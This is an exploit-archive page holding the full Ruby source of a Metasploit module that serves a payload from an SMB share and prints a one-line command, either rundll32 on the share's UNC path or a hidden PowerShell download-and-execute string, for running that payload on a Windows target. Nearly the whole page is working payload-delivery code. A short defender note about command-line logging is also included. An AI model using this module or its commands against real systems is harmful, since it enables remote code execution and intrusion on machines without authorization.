SMB Delivery Module

2016.08.06
Credit: Andrew Smith
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

require 'msf/core'
require 'msf/core/exploit/powershell'

# Metasploit module that hosts a generated payload on an SMB share and prints
# the single command an operator would run on the target to fetch and execute
# it. Two delivery forms are offered as targets: a DLL loaded via rundll32.exe
# and a PowerShell download-and-execute command line.
#
# Defender note: both forms put a UNC reference to the serving share on the
# target's command line (rundll32 with the share path, or a PowerShell command
# built around that same path with a hidden window and no profile), which is
# what process command-line logging on the endpoint would record.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Powershell

  # Registers module metadata, the two targets and the FILE_NAME option.
  # FILE_CONTENTS (normally provided by the Share mixin) is deregistered
  # because #primer assigns file_contents itself.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "SMB Delivery",
      'Description'    => %q{ This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell. },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Andrew Smith',
        'Russel Van Tuyl'
      ],
      'References'     => [
        ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3074']
      ],
      'Payload'        => {
        'Space'       => 2048,
        'DisableNops' => true
      },
      'Platform'       => 'win',
      'Targets'        => [
        ['DLL', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64] }],
        ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64] }]
      ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 26 2016",
      'DefaultTarget'  => 0))

    register_options(
      [
        # Name under which the payload is exposed on the share.
        OptString.new('FILE_NAME', [ false, 'DLL file name', 'test.dll'])
      ], self.class)

    deregister_options('FILE_CONTENTS')
  end

  # Fills the shared file with the generated payload for the selected target
  # and prints the command that retrieves it over the share's UNC path.
  #
  # NOTE(review): presumably invoked by the SMB Server::Share mixin once the
  # share is listening; the call point is not visible here. `unc` and `ssl`
  # are likewise mixin-provided — confirm against the mixin.
  # A target name other than 'PSH' or 'DLL' falls through the case and prints
  # only the status line.
  def primer
    print_status('Run the following command on the target machine:')
    case target.name
    when 'PSH'
      # The shared file is a PowerShell command line wrapping the encoded
      # payload; the two keyword options are interpreted by cmd_psh_payload
      # in the Powershell mixin (not visible here).
      self.file_contents = cmd_psh_payload(
        payload.encoded,
        payload_instance.arch.first,
        remove_comspec: true,
        use_single_quotes: true)
      # When ssl is off, ignore_cert stays nil and interpolates as an empty
      # string, so the certificate-ignoring snippet is only prepended for SSL.
      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
      download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
      download_and_run = "#{ignore_cert}#{download_string}"
      print_line generate_psh_command_line(
        noprofile: true,
        windowstyle: 'hidden',
        command: download_and_run)
    when 'DLL'
      self.file_contents = generate_payload_dll
      # rundll32 is pointed straight at the UNC path of the shared DLL; the
      # trailing ",0" is the entry-point argument rundll32 expects after it.
      print_line("rundll32.exe #{unc},0")
    end
  end
end

References:

https://github.com/rapid7/metasploit-framework/pull/3074

